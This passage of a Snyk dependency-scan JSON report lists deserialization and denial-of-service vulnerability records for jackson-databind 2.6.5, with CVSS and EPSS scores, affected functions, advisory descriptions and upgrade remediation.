target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36181" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:41:09.172252Z", - "functions_new": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.686589Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Yangkun (ICSL)" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2854", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", - "title": "GitHub Release" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:04.169362Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", - "epssDetails": { - "percentile": "0.74700", - "probability": "0.00431", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-20190" - ], - "CWE": [ - "CWE-502", - "CWE-918" - ], - "GHSA": [ - "GHSA-5949-rw7g-wx7w" - ], - "RHSA": [ - "RHSA-1610966837463990" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-18T12:50:16.466618Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-16T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-18T17:23:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:17.193594Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.7" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9)", - "[2.8.0,2.8.11.4)", - "[2.7.0,2.7.9.6)", - "[,2.6.7.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9", - "2.8.11.4", - "2.7.9.6", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2326", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", - "title": "Github Release Tag" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12086", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:55.897269Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", - "epssDetails": { - "percentile": "0.74218", - "probability": "0.00415", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12086" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5ww9-j83m-q7qx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-05-19T10:19:10.287403Z", - "functions_new": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-17T18:12:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-05-17T18:12:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.785293Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.12.6.1", - "2.13.2.1" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when using nested objects." - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", - "className": "UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2816", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/3416", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.056720Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", - "epssDetails": { - "percentile": "0.60309", - "probability": "0.00218", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36518" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-03-11T13:26:43.073121Z", - "functions_new": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-11T13:18:25Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-03-11T14:24:04Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.929583Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.12.6.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3582", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.201956Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub 